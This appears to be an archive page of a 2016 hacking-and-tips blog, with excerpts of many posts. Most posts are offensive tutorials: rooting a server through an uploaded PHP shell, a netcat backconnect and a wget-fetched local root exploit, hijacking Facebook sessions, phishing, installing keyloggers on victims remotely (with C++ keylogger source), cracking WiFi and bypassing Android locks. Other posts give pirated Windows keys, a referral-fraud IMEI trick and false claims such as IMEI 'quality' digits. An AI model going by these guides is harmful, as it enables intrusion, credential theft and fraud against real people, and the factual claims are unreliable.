Posts

Showing posts from May, 2016

‪#‎Server_Rooting‬

‪#‎Server_Rooting‬ How To Gain RoOt Privilages In ‪#‎Linux_Server‬. But, let me tell you what is Server Rooting? Ans-)Server rooting is a process where an attacker intrudes to the system or you can say server and escalates the ROOT privileges. Now we are going to learn how it works.WHAT WE NEED ..??? 1. PHP Shell Uploaded On A Server .. 2. Netcat .. STEPS:- * First Of All , Download Netcat Download Link - http://www.downloadnetcat.com/ nc11nt.zip * Open Netcat * Type -lnvp 443 And Press Enter..! You will get something like this :- * Now Go To Backconnect Option , Give The Port As 443 , And Click On Connect...!! * Now Your Shell Is On Netcat . Now , You will get the following commands. oK , Now The Most Tricky part Executing Shell To T4he Server ... *Find A Local roOT Exploit For The Same Kernal Here is the list of exploit:- http://pastebin.com/ A0sUhhrz * Now Upload It At Any Web Hosting Site Or At Any Server.. * And Give The Command "wget abc.com/ exploitname " abc.com is th

‪#‎Hacking‬ ‪#‎Facebook‬ Account From Your ‪#‎Android‬ Device

‪#‎Hacking‬ ‪#‎Facebook‬ Account From Your ‪#‎Android‬ Device I Know Many of you were waiting for this Post about How to hack Facebook account using your android device.This tutorial is easier and you will get almost 95% success if you and your victim are on same network. I am writing this tutorial to make people aware so please make sure that you are not using this tutorial in any illegal way. This tutorial is just for educational purpose. There’s a app Outhere Called “Faceniff“. FACENIFF is basically an Android application that lets users sniff and intercept web session profiles over Wi-Fi networks, stealing other users’ credentials through which you can attack your victim’s Facebook, Orkut, Twitter and much more accounts in a minute. Isn’t it Cool Note :- The Tutorial Only Works if you and your Victim are On Same WiFi Network Follow The Given Steps Below : 1) At First Download Faceniff from below HERE : http://faceniff.ponury.net/ 2) Connect to the working network connection and ope

What is the difference between ‪#‎IP‬ address and ‪#‎Mac‬ address?

What is the difference between ‪#‎IP‬ address and ‪#‎Mac‬ address? IP address: To every device IP address is assigned, so that device can be located on the network. In other words IP address is like your postal address, where anyone who knows your postal address can send you a letter. MAC (Machine Access Control) address: A MAC address is a unique serial number assigned to every network interface on every device. Mac address is like your physical mailbox, only your postal carrier (network router) can identify it and you can change it by getting a new mailbox (network card) at any time and slapping your name (IP address) on it.

steps to ‪#‎Hack‬ any ‪#‎Bluetooth‬ enabled ‪#‎mobile‬ phone-

Follow these steps to ‪#‎Hack‬ any ‪#‎Bluetooth‬ enabled ‪#‎mobile‬ phone- Download Super Bluetooth Hack 1.8 and also check that your mobile is in the list of supported handsets from the link provided. After you have downloaded the .jar file, install it in your mobile. There is no need to install the software in the mobile which you want to hack. Turn on the Bluetooth of your handset and open the Super Bluetooth Hack Application. Select the connect option and then Inquiry Devices to search for any of mobile that has its Bluetooth turned on nearby. Your friend’s Bluetooth must also be turned on to be found. Pairing between the devices is also necessary sometimes. Once your friend’s phone has been found, try out its functions!

How to CHECK ‪#‎MOBILE‬ ‪#‎QUALITY‬

CHECK ‪#‎MOBILE‬ ‪#‎QUALITY‬ Press *#06# If 7th & 8th digit is: 00 -Best & Original. 01 or 10 -Gud. 02 or 20 -Not gud. 08 or 80- Bad. 13- Very Bad

Windows ‪#‎serial_keys‬ all

Windows ‪#‎serial_keys‬ all ‪#‎Windows_8‬.1 Professional GCRJD-8NW9H-F2CDX-CCM8D-9D6T9 Windows 8.1 Professional N HMCNV-VVBFX-7HMBH-CTY9B-B4FXY Windows 8.1 Enterprise MHF9N-XY6XB-WVXMC-BTDCT-MKKG7 Windows 8.1 Enterprise N TT4HM-HN7YT-62K67-RGRQJ-JFFXW Windows 8 Windows 8 Professional NG4HW-VH26C-733KW-K6F98-J8CK4 Windows 8 Professional N XCVCF-2NXM9-723PB-MHCB7-2RYQQ Windows 8 Enterprise 32JNW-9KQ84-P47T8-D8GGY-CWCK7 Windows 8 Enterprise N JMNMF-RHW7P-DMY6X-RF3DR-X2BQT Windows 7 Windows 7 Professional FJ82H-XT6CR-J8D7P-XQJJ2-GPDD4 Windows 7 Professional N MRPKT-YTG23-K7D7T-X2JMM-QY7MG Windows 7 Enterprise 33PXH-7Y6KF-2VJC9-XBBR8-HVTHH Windows 7 Enterprise N YDRBP-3D83W-TY26F-D46B2-XCKRJ Windows 7 Enterprise E C29WB-22CC8-VJ326-GHFJW-H9DH4 Windows Server 2012 R2 Windows Server 2012 R2 Server Standard D2N9P-3P6X9-2R39C-7RTCD-MDVJX Windows Server 2012 R2 Datacenter W3GGN-FT8W3-Y4M27-J84CP-Q3VJ9 Windows Server 2012 R2 Essentials KNC87-3J2TX-XB4WP-VCPJV-M4FWM Windows Server 2012 Windows Ser

‪#‎Tricks‬ To ‪#‎Clean‬ All ‪#‎Temporary‬ Files,Cookies,

‪#‎Tricks‬ To ‪#‎Clean‬ All ‪#‎Temporary‬ Files,Cookies, Temperary Internet Files.. Just use notepad.... Step 1: Start with making a new txt file. Step 2: Paste this code in the txt file: Code: Select all @echo off echo Webhog Cleaner echo waiting del /f /s /q %systemdrive%\*.tmp del /f /s /q %systemdrive%\*._mp del /f /s /q %systemdrive%\*.log del /f /s /q %systemdrive%\*.gid del /f /s /q %systemdrive%\*.chk del /f /s /q %systemdrive%\*.old del /f /s /q %systemdrive%\recycled\*.* del /f /s /q %windir%\*.bak del /f /s /q %windir%\prefetch\*.* rd /s /q %windir%\temp & md %windir%\temp del /f /q %userprofile%\cookies\*.* del /f /q %userprofile%\recent\*.* del /f /s /q ?%userprofile%\Local Settings\Tempor ary Internet Files\*.*? del /f /s /q ?%userprofile%\Local Settings\Temp\* .*? del /f /s /q ?%userprofile%\recent\*.*? echo complete! echo. & pause Step 3: Now save the file as "Cleaner.bat

What is 3G, 4G, 5G etc

Little About ‪#‎2G‬, ‪#‎3G‬, ‪#‎4G‬, mobile networks? G in 2G, 3G and 4G stands for the “Generation” of the mobile network. Today, mobile operators have started offering 4G services in the country. A higher number before the ‘G’ means more power to send out and receive more information and therefore the ability to achieve a higher efficiency through the wireless network. Understanding the mobile networks: As the name would suggest, 1G was the first generation of mobile networks. Here basically, radio signals were transmitted in ‘Analogue’ form and expectedly, one was not able to do much other than sending text messaging and making calls. But the biggest disadvantage, however came in the form of limited network availability, as in the network was available only within the country. 2G networks on the other hand, were based on narrow band digital networks. Signals were transmitted in the digital format and this dramatically improved the quality of calls and also reduced the complexity of

To find your ‪#‎android‬, if it is in silent mode?

To find your ‪#‎android‬, if it is in silent mode? Use Google’s official Android Device Manager to locate your phone -> Go to Android Device Manager by Google in your desktop browser ->Login with the same Gmail account you used to activate your Android Device before and registered in ‪#‎Google‬ Play. ->Your device name and last login date will come on screen. A ->Three options will be there : Ring, Lock and Erase. ->By clicking on Ring, your device starts ringing at high volume which help you find your phone in seconds. This function works even when your phone is in silent mode. ‪#‎Tricks‬

It's amazing-Heat can be used to hack computer!!

It's amazing-Heat can be used to hack computer!! Researcher develop technique for stealing data from computers which are not connected to Internet using heat generated by them Stealing from computers not connected to internet became that much more easier using the new technique found by security researchers from Ben Gurion University. Security researchers from Ben Gurion University in Israel have found a way to retrieve data from air- gapped computers i.e. computers not connected to internet, using only heat emissions and a computer’s built-in thermal sensors. The research team consists of Mordechai Guri, Gabi Kedma and Assaf Kachlon and are overseen by their adviser Yuval Elovici. Together they have devised a method which could be used potential hackers to steal passwords from a protected system and transmit the stolen data from a internet connected PC in close proximity to their command and control center. Computers produce varying levels of heat depending on how much processing

How to use Mobile Camera a a WebCam

Hello friends, today I'm going to tell you that how to use mobile camera as webcam. There is a software ' SmartCam '. You have to install it on your system as well as on your mobile phone. By using Bluetooth or WiFi it will easily connect and turn your mobile camera into a webcam. Follow These steps: 1. Install it on your PC or Laptop 2. And also you have to install it on your mobile - SmartCam for Android Note: Search it in your mobile app store, it is easily available for almost every phone. 3. Start up SmartCam on your PC and go to > File > Settings and check your connection and proceed > next step. 4. Start SmartCam on your phone and go to > Options > Connect and it will ask you for server name and you need to type your PC IP address or your system name. Enjoy smile emoticon

12 interesting computer Facts That U Should Know...

12 interesting computer Facts That U Should Know... 1)Over 6,000 new computer viruses are released every month. 2)The first computer mouse, constructed in 1964, was made out of wood.(by Doug Engelbart) 3)Theaverage human being blinks 20 times a minute – but only 7 times a minute when using a computer. 4)The first electro-mechanical computer was developed in 1939. 5)By the end of 2014 there will be around 20 billion devices connected to the internet. 6)5 out of every 6 internet pages are porn related. 7)Over 1 million domain names are registered every month. 8)With it’s 800 million interent users, Facebook would be the third largest country in the World. 9)The first hard drive was created in 1979 and could hold 5MB of data. 10)The nVidia GeForce 6800 Ultra video card contains 222 million transistors. 11)20% of online viruses are released by organized crime units. 12.The engineers who developed the IBM PC were known as “The Dirty Dozen” Hope you liked it.

Here is a trick to earn simple money....

Here is a trick to earn simple money.... Go to play store download ‪#‎Whaaf‬ app After downloading open it and tap on top right corner (login) Pres okay for the permission of your facebook id... It will ask for reffrel code BD19256 Use this to get 0.3$ I got a trick for rooted users Install xposed frmework on your device and in it install imei change module Uninstall your app login through a new facebook id change your imei and rebbot your phone again install whaaf login and use the reffrel code of your first whaaf id... Note - u can find ur reffrel link in the swipe menu->invite friend You can get your money via paypal then to your bank Make money Make use of ‪#‎tech‬ ‪#‎smartphone‬

Best Cydia Apps To Hack Wifi Passwords 2015

Best Cydia Apps To Hack Wifi Passwords 2015 Today there are many mobile users that use iphone today and many of them are now jailbreak their iphone and are using cydia app to customize the interface and to unlock hardware restriction of the iphone and now in this post will tell you a very intersting trick that you can implement after installing cydia apps in your iphone. This trick is about hacking wifi passwords through your iphone by using cydia app, yes it is possible as by jailbreak your iphone there are many hidden features that are get enable which even many of you don’t know and in this post i will be discussing one of them. Below i have listed the best cydia apps by which you can decrypt the wifi password of wifi and can easily access any other’s network. I have selected these apps according to their actual working and on the expert reviews about the apps.Just download and install these apps and have fun over wifi networks. 1-SpeedTouched Simliar to iwepPro this app is very eff

How to Change Mac Address in Kali Linux

How to Change Mac Address in Kali Linux 1: open terminal type macchanger 2. If you want to see help option of macchanger. Type macchanger --help and hit enter 3. Run ifconfig command on terminal to see your interface name and current MAC address 4. Before changing your MAC address you have to shut down your interface. Syntax – ifconfig interfacename down Ex – ifconfig eth0 down – write interface name according to your interface name. 5. Now time to change MAC address. Syntax – macchanger –r interfacename EX – macchanger –r eth0 As result you can see there are three MAC addresses first 2 addresses are our original MAC addresses and 3rd MAC address is FAKE. 6. After changing MAC address you have to up your interface. Syntax – ifconfig interfacename up Ex – ifconfig eth0 up 7. Run ifconfig command in terminal to check MAC address and there you can see we have successfully changed our MAC address.

How to ‪#‎Recover‬ ‪#‎Forgotten‬ ‪#‎Pattern_Lock‬ on Android Phones or Tablets?

How to ‪#‎Recover‬ ‪#‎Forgotten‬ ‪#‎Pattern_Lock‬ on Android Phones or Tablets? 1. First of all connect your device to the PC and make sure USB debugging is enabled. 2. Now on your Windows PC, Go to START-> RUN –>Type CMD 3. Now one by one type the following commands in the command prompt: Adb shell cd/data/data/com.android.prov iders.settings/ databases sqlite3 settings.db update system set value=0 where name=’lock_pattern_autolock’; update system set value=0 where name=’lockscreen.lockedout permanently’; .quit“ 4. After applying the above stated commands, reboot your device now. After normal reboot, you again will notice Lock pattern screen, but this time, you will have the choice to create a new pattern lock code for your device.

How to Generate ‪#‎Harmonic‬ ‪#‎Series‬ in ‪#‎java‬

class HarmonicSeries { public static void main(String args[]) { int num = Integer.parseInt(args[0]); double result = 0.0; while(num > 0) { result = result + (double) 1 / num; num--; } System.out.println("Output of Harmonic Series is "+result); } }

General ‪#‎Keyboard_Shortcuts‬, General Keyboard Shortcuts

General ‪#‎Keyboard_Shortcuts‬, General Keyboard Shortcuts General Keyboard Shortcuts CTRL+C (Copy) CTRL+X (Cut) CTRL+V (Paste) CTRL+Z (Undo) DELETE (Delete) SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin) CTRL while dragging an item (Copy the selected item) CTRL+SHIFT while dragging an item (Create a shortcut to the selected item) F2 key (Rename the selected item) CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word) CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word) CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph) CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph) CTRL+SHIFT with any of the arrow keys (Highlight a block of text) SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document) CTRL+A (Select all) F3 key (Search for a file or a folder) ALT+ENTER (Vi

Stop checking your phone before Sleeping**

Stop checking your phone before Sleeping** The act of looking at your cell phone screens right before you sleep is such a bad idea and it is one that is more devastating than many people think. A clinical professor of Psychiatry at the UCLA School of Medicine, Dr Dan Siegel explains all the negative effects that looking at your cell phone screen before sleeping can have on our brain and body. The impact of screens on sleep is devastating. You know people are exposing their eyes to the stream of photons from this object that basically tells your brain to stay awake, It’s not time for sleep yet. Its 10 pm, 11 pm, 12 pm and you are checking for email, checking for text , chatting and doing all the rest on your phone. **ShareIt

Steps to ‪#‎Speed‬ Up Your ‪#‎Computer‬’s ‪#‎Performance‬

Steps to ‪#‎Speed‬ Up Your ‪#‎Computer‬’s ‪#‎Performance‬ 1. Make Sure Your Hardware is Sufficient Above and beyond everything you can do with software to optimize the function of your computer, making sure you have the proper hardware to support Windows is critical. 2. Clean Your Desktop Is your Windows Desktop dotted with files? Have you noticed that your computer has been running slower and slower? Do you see the hard drive light often flashing while you wait for the computer to respond to an action? There are steps you can take to fix it. Read this article. 3. Scan Your Windows System for Errors An operating system is a collection of files that perform different functions. It is possible, over time, that one or more of these system files has changed or become corrupted. If this happens, the speed of your system may decrease. By using a utility called “System File Checking”, it will inspect these files and correct any problem it finds. 4. Scan for Viruses, Spyware and Adware Every W

Ten Ways to Hack Facebook Account :

Ten Ways to Hack Facebook Account : Note : don't use these techniques for wrong purpose. 1 : Phishing : Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims "Email Address" and "Password" is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials. 2 : Keylogging : Keylogging is the easiest way to hack a Facebook password. Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Keylogger is basically a small program which, once is installed on victim's computer, will record every thing victim types on his/her computer. The logs are then send back to th

keylogging hacking concepts - most easy way to hack any pc ..

keylogging hacking concepts - most easy way to hack any pc .. basically keylogger are the special hacking software .when you install them in any computer then they are totally undetecteble at all . means if in your pc somebody installed the keylogger then you never find out any how .. after the keylogger successfully installed in any pc .there is two part .one operator and second is victim .once keylogger installed in victim pc the operator can access all activity of the victims computer anywhere ..some famous keylogger are . 1,spyagent- this is award wining keylogger you can track all typing activity of any victim.you track all run programme and also find all saved file in victim pc . at spyagent website all introduction is given ..how to use it in simple way 2,refog keylogger this advanced keylogger is so famous in these day .by using this you also can get anytime screenshot of any victim pc and one time you can handel lots of victims pc.and it is totally undetecteble from antivirus

Android Keylogger

Android Keylogger Hello friends Today I am going to show you android hacking application An keylogger type monitoring application . Let Me tell about what is a keylogger? A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a small program that monitors each keystroke a user types on a specific keyboard. Keyloggers are used to Record System events: Power offs, SD cards removal, USB connections, WiFi connections. Now what is Android Keylogger(Kidlooger.apk Apps)? What is Kidlooger? KidLogger free application used to track phone coordinates by GPS or Wifi records and uploads incoming/outgoing calls and photos taken by the target phone. its Undetectable. It is not visible for any antivirus.you can uploaded to your online account. you can keep a watch your Android with KidLogger. Benefits Of Using Android Kidlooger? Kidlooger is a safe and invisible spy tool by which you can know every activity of a target android mobile phone. With the help of kidlooger, you

Fb hacked by Keylogger.....

Fb hacked by Keylogger..... How to hack facebook, twitter, Gmail password using Winspy Keylogger Keylogger is also one of the best ways to hack password of facebook, gmail or any other website account. In this post i am going to show how to hack passwords using winspy keylogger. Read the steps givn below: 1. First of all get your Winspy keylogger. Download it from the link given below Download Here : http://www.mediafire.com/?x614qhmh15mrj 2. After downloading, run the program and create the user id and pasword. Remember this password as it is required each time you start Winspy and even while uninstalling. 3. Then a new dialog box will open to show you the hotkey (Ctrl + Shift + F12 ) to start keylogger. 4. Now press the hot key written in last step to go to the login form and enter login details to login. 5. Now you are on main screen of the software. CLink on remote at top and then remote install. > user – type in the victim’s name > file name – Name the file to be sent. Use t

HOW TO CREATE KEYLOGGER USING C++.?

HOW TO CREATE KEYLOGGER USING C++.? Any Idea about keylogger..? Keylogger is a software program that is used to monitor and log each of the keys a user types into a computer keyboard.In this way keylogger steals user information such as passwords and sends it to the Hacker. There are many Key loggers in the market , but never mind, we are programmers and we develop our version of the tool. copy the below code, compile and run it. Once you run the program you can see the “log” file created along with the executable ones CODE : ‪#‎include‬ #include using namespace std; #include #include int Save (int key_stroke, char *file); void Stealth(); int main() { Stealth(); char i; while (1) { for(i = 8; i <= 190; i++) { if (GetAsyncKeyState(i) == -32767) Save (i,"LOG.txt"); } } system ("PAUSE"); return 0; } int Save (int key_stroke, char *file) { if ( (key_stroke == 1) || (key_stroke == 2) ) return 0; FILE *OUTPUT_FILE; OUTPUT_FILE = fopen(file, "a+"); cout &l

Facebook Hacking techniques!

Facebook Hacking techniques! 1. Phishing Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims "Email Address" and "Password" is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials. 2. Keylogging Keylogging is the easiest way to hack a Facebook password. Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Keylogger is basically a small program which, once is installed on victim's computer, will record every thing victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address. 3. Stea

Epic Knowledge

1.) You use more than 10% of your brain (in fact you use all of your brain). Most of your brain is active all of the time, even when you’re asleep. 2.) Actually, your brain is MORE active when you're asleep. 3.) Information can go in between parts of your brain at a speed of 260mph. 4.) You have over 100,000 miles of axons in your brain. They could wrap around the Earth 4 times. 5.) Your brain doesn’t have pain receptors. It can’t feel anything. 6.) Its lack of pain receptors is why doctors can perform brain surgery on conscious patients. 7.) Kim Ung-Yong of South Korea had the highest IQ ever recorded (210). 8.) Your brain is the fattest organ in your body. It's about 60% fat. 9.) Ancient peoples thought the brain wasn’t important as the stomach and heart. When mummifying people, Egyptians would pull the brain out through the nose. 10.) Brain tissue has a consistency that's very similar to tofu. 11.) Your brain can generate about 25 watts of power at any given time. It cou

"Spatio-Temporal Dynamics"::-New way to steal passwords

"Spatio-Temporal Dynamics"::-New way to steal passwords Hackers can speculate PINs by interpreting video of people tapping on their smartphone screens even when the display itself is not visible, according to the presentation shown by the researchers at Syracuse University. Software used to interpret such video relies on “spatio-temporal dynamics” to measure the distance from the fingers to the phone’s screen, and then guess exact which characters the fingers tap on a keypad. This research was published by the Association for Computing Machinery last year. The technology is very easy simple for anybody who knows programming, and millions of targets are available due to the flaring use of smartphones. With a combination of image analysis and motion tracking algorithms, software filled in the gaps, which were remarkably effective at “guessing” the PINs users typed in. The software figured out the correct password between 40% and 62% of the time on the first guess, which depende

How To Lock/Unlock PC Using Bluetooth Of Smartphone

How To Lock/Unlock PC Using Bluetooth Of Smartphone The method is very cool and depends on a third party software that will set bluetooth security pairing with your PC and mobile and your computer will be secure. So have a look on some simple steps below to proceed. Steps To Secure Your Computer By Lock/Unlock Using Bluetooth of Smartphone: 1-First of all Download and Install BtProximity program in your windows PC. 2-Now install the app and the you will see a icon will get created on the system tray. 3-Now right click on the BtProximity icon on system tray and select Configure. 4-Now a configure screen will get displayed like shown below. 5-Now pair your device with your computer by right clicking on bluetooth icon tray and then selecting Add a bluetooth device. 6-Now in the Configure dialog box click on Install button after setting all the fields according to your wish, Like tick on Lock when device go out of range etc. 7-Thats it you are done now your computer is protected with your

How To Make Your Computer Welcome You at Windows Startup?

How To Make Your Computer Welcome You at Windows Startup? There is a very simple code that you have to paste in notepad and make your computer speak whatever you write in it. And your computer will speak same so just follow some of simple steps discussed below. 1-First of all click on start and then type Notepad and then press enter. 2-Now in notepad paste the below code :- Dim speaks, speech speaks=”Welcome to your PC, Username” Set speech=CreateObject(“sapi.spvoice”) speech.Speak speaks 3-In the place of user name you can put your own name and anything you want computer to speak. 4-Now save this as Welcome.vbs in your desktop. 5-Now copy the file and paste in the C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) and to C:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7 and Windows Vista) if C: is your System drive. 6-Thats it you are done, now every time you start your computer a welcome voice wil

How To Became A Great hacker

How To Became A Great hacker 1. Learn TCP/IP, Basic Information gathering, Proxies, Socks, SSL, VPN, VPS, RDP, FTP, POP3, SMTP, Telnet, SSH. 2. Learn Linux, Unix, Windows - You can do this using vmware or any virtual desktop utility. 3. Learn a programming language that's compatible with all OS - Perl, Python, C, ASM 4. Learn HTML, PHP, Javascript, ASP, XML, SQL, XSS, SQLI, RFI, LFI 5. Learn Reverse engineering and crack some programs for serials easy ones like mirc, winzip, winrar or old games. 6. Code a fuzzer for common protocols - ftp, pop3, 80, 8080 - Pick some free software like ftp server, mail server, apache or iis webserver or a webserver all-in-one pack, or teamspeak, ventrilo, mumble. 7. Code a tool that uses grep to sort out unique code in source codes. 8. Make a custom IPtable, IPsec firewall that blocks all incoming traffic and out going traffic and add filters to accept certain ports that your software or scripts use. 9. Pick a kernel in linux or unix, also pick a Mi

How To Encrypt Keyboard To Avoid Keyloggers

How To Encrypt Keyboard To Avoid Keyloggers With encrypting keystrokes of keyboard the value that a keylogger will be different from the actual value that the user had entered and everytime keylogger will be sending wrong data to hackers and that will not harm your at all. So have a look on simple steps below to implement this in your windows PC. Steps To Encrypt Keystrokes To Avoid Keylogger Attacks :- 1-First of all download and install the tool KeyScrambler. 2-Now after downloading install it and after complete install you have to reboot your system do it. 3-Now when your computer boot up right click on the icon of KeyScrambler in the system tray at bottom of screen. 4-Now choose options from there and Keyscrambler will open and you will see screen like below. 5-Now you can alter settings in this according to your wish and after that simply click on ok 6-Thats it you are done, now you can see this tool everytime you open your browser and also your keystrokes are encrypted and will n

How To See Someone’s Hidden Friends On Facebook?

How To See Someone’s Hidden Friends On Facebook? In this method you will use google chrome browser to reveal the secret friends of any of your friend. A chrome extension will work for you for resolving this issue. You just have to follow some of the simple steps discussed below. Steps To See Someone’s Hidden Friends On Facebook :- 1-First of all download and install latest version of Google Chrome Browser in your computer. 2-Now install the extension Facebook Friends Mapper.\ 3-Now this extension will get added to your google chrome browser. 4-Now login into your facebook account and open the profile of friends whose hidden friends you want to see. 5-Now click on friends option there in your friends profile. 6-Now you will see a reveal friends section there which will only appear when you had added the above extension. Just click on it. 7-Now it will start scanning the friends and will display all the hidden friends of that person. For more updates like and share our page ‪#‎Hidden‬ ‪

How To Create Apple I'D Without Credit Card 2015

How To Create Apple I'D Without Credit Card 2015 Hi Guys Today i am going to tell you How To Make Apple I'D without credit card 2015-16 The method is very simple and easy and you will create your Apple I'd by this. And this method is implemented on iPhone but you can also do this for all other iOS device like iPod etc. So just follow up the below steps to proceed. Create Apple I'D Without Credit Card 2015 Steps To Create Apple I'D Without Credit Card First of all make sure that you have not logged in your account and if you are then log out from your device. Now open your app store and tap any of the free apps available there, you can choose and of the app from there. Now hen you click on the free button there, that button will get converted into install and when you click on it your downloading process will initiates and then there will be two option there one is sign in and other “Create New Apple I'd“, just tap on it to create a new iOS I'd. Now select yo

Windows 10 Microsoft's Operating System Can Disable Pirated Software or Games

Windows 10 Microsoft's Operating System Can Disable Pirated Software or Games, Report Says gasp emoticon gasp emoticon gasp emoticon Microsoft’s updated End User Licence Agreement terms and conditions let it disable any counterfeit software or hardware and, if you’re running a Windows 10 computer, you’ve just agreed to them !!!! “Updates to the Services or Software, and Changes to These Terms” – of Microsoft’s Services EULA stipulates that it “may automatically check your version of the software and download software update or configuration changes, including those that prevent you from accessing the Services, playing counterfeit games, or using unauthorized hardware peripheral devices.” ‪#‎RIP‬ windows 10 pacman emoticon Hit like like emoticon and Share ‪#‎Windows10‬ ‪#‎disable‬ ‪#‎PiratedSoftware‬

DOS ON TORRENT !!!!

DOS ON TORRENT !!!! How to Exploit BitTorrent for Large-Scale DOS Attacks :- A flaw discovered in several widely used BitTorrent applications, including uTorrent, Vuze and Mainline, could be used to carry out a devastating distributed denial of service (DDoS) attack that makes it very easy for a single undetectable hacker to bring down large sites. A new research by Florian Adamsky of the City University London shows that open BitTorrent protocol can be exploited to carry out Distributed Reflective Denial of Service (DRDoS) attacks. The bitTorrent protocol is a file-sharing protocol used by Millions of active online users at any given point in the day to exchange files over the Internet. DRDoS attack is a more sophisticated form of conventional DDoS attack where open and misconfigured DNS (Domain Name System) can be used by anyone to launch high-bandwidth DDoS attacks on target websites. In a paper, titled "P2P File-Sharing in Hell: Exploiting BitTorrent Vulnerabilities to Launch

Add As Many As Members U Want In Whatsapp Group ‪#‎Whatsapp‬ ‪#‎hack‬…….

Add As Many As Members U Want In Whatsapp Group ‪#‎Whatsapp‬ ‪#‎hack‬……. 1.First of all u need to be ‪#‎rooted‬ . 2.Then install ‪#‎es‬ explorer from play store. 3.Then open es explorer and give permission as option– tools — root.. Then go to option– tools–root again and click r-w mount ; And give permissions to r-w as write/read. 4.Then goto folder root/data/data/com.whatsapp/shared_prfs/com.whatsapp prefer.xml…. 5.Der u will find com.whatsapp prefer.xml open it and edit it in any editor or choose es editor to edit 6.Then that xml wil be open and thn search for participants_size_limit” value=”100″ />” and thn chng it to your choice . 7.Then forse stop whatsapp by going to apps- whatsapp- about – click on force stop .. 8.Then check participation limit … 9. THE MOST IMPORTANT THING ….. ENJOY

vMOST COMMON TERMS USED IN CYBER/TECHNOLOGY AND THEIR MEANING:

MOST COMMON TERMS USED IN CYBER/TECHNOLOGY AND THEIR MEANING: .1. HTTP- Hyper Text Transfer Protocol 2. HTTPS -Hyper Text Transfer Protocol Secure 3. IP -Internet Protocol 4. URL -Uniform Resource Locator 5. USB -Universal Serial Bus 6. VIRUS -Vital Information Resource Under Seized 7. 3G -3rd Generation 8. GSM -Global System for Mobile Communication 9. CDMA -Code Division Multiple Access 10. UMTS -Universal Mobile Telecommunication System 11. SIM -Subscriber Identity Module 12. AVI -Audio Video Interleave 13. RTS -Real Time Streaming 14. SIS -Symbian OS Installer File 15. AMR -Adaptive Multirate Codec 16. JAD -Java Application Descriptor 17. 3GPP -3rd Generation Partnership Project 18. 3GP -3rd Generation Project 19. MP3 -MPEG Player 3 20. MP4 -MPEG Player 4 (video file) 21. AAC -Advanced Audio Coding 22. GIF -Graphic Interchangeable Format 23. JPEG -Joint Photographic Expert Group 24. BMP -Bitmap 25. MMORPG -Massive Multiplayer Online Role Playing Game 26. WLAN -Wireless Local Area N

How to code: learning to make apps and software is easier than you think

How to code: learning to make apps and software is easier than you think There’s a strong demand for talented programmers right now and, since it’s the Year of Code, here's how you can become an expert in coding. By Roland Waddilove | 19 May 14 Share Tweet Send Comments Learning to code is easier than you might think Learning to code is easier than you might think How to code - year of code There’s a strong demand for talented programmers right now and, since it’s the Year of Code, we show you how you can become an expert Coding – or programming - is everywhere and in everything around us. All computers run code: it’s what makes them burst into life when the power is turned on and what makes things happen when an icon or menu is clicked. Code isn’t just for PCs: smartphones wouldn’t be nearly as smart without code for the operating system and apps. Tablets require similar code, as do TV boxes from Sky, Virgin media and others. Websites are powered by code (see How to build a we

How to create your own OS (Operating System)

Picture of Create your own operating system! Nearly every true computer geek has, at some point, wanted to write an operating system. However, writing a custom kernel and other bits takes years of study, experience and patience. If you intend to keep your sanity, then the best course of action is to use someone else's code. Cosmos*, or C# open source managed operating system, is a pre-made kernel that provides you with "OS legos" that allow you to quickly and easily create your own operating system. You will need: @ Microsoft Visual C# 2008. @ A knowledge of the C# programming language (don't worry if you don't have this, it's a pretty easy language). @ The Cosmos user kit (milestone 4). Step 1: Getting the software Picture of Getting the software Let's do a run down of the necessary software mentioned earlier. Microsoft Visual C# can be downloaded free if you get the express edition. You can download it at http://www.microsoft.com/express/downloa

How To Install and Run Backtrack On Android

How To Install and Run Backtrack On Android December 5, 2015 7 Install and Run Backtrack On Android Install and Run Backtrack On Android InShortViral: Guide you step by step to How to install and run Backtrack on android. Recently, We are discussed about Install and Run BackTrack on Windows. Android is the best OS for penetration testing. It designed for digital forensics and penetration testing or hacking tool. It comes with many more updated tools. As the Backtrack is also available with ARM architecture which makes it possible to run Backtrack on a ARM machine such as mobiles or tablets. Also Read: How To Install Kali Linux On Any Android How To Install and Run Backtrack On Android Requirements: A Rooted Device [ Root Simple Android Phone Without Pc ] Backtrack ARM [ Download ] BusyBox [ Download ] Android Terminal and android VNC If you are using PC then you need 7zip for extraction otherwise you can use zarchiver on you android phone. [ Download ] Step to Insta

How to Crack a Wi-Fi Network's WPA Password with Reaver

How to Crack a Wi-Fi Network's WPA Password with Reaver Adam Pash 1/09/12 5:00amFiled to: HACK ATTACK 5.3M 244 68 How to Crack a Wi-Fi Network's WPA Password with Reaver Your Wi-Fi network is your conveniently wireless gateway to the internet, and since you're not keen on sharing your connection with any old hooligan who happens to be walking past your home, you secure your network with a password, right? Knowing, as you might, how easy it is to crack a WEP password, you probably secure your network using the more bulletproof WPA security protocol. How to Crack a Wi-Fi Network's WEP Password with BackTrack You already know that if you want to lock down your Wi-Fi network, you should opt for WPA… Read more Here's the bad news: A new, free, open-source tool called Reaver exploits a security hole in wireless routers and can crack most routers' current passwords with relative ease. Here's how to crack a WPA or WPA2 password, step by step, with Reaver—and ho

How to Install and run Kali Linux in Any Android Mobile

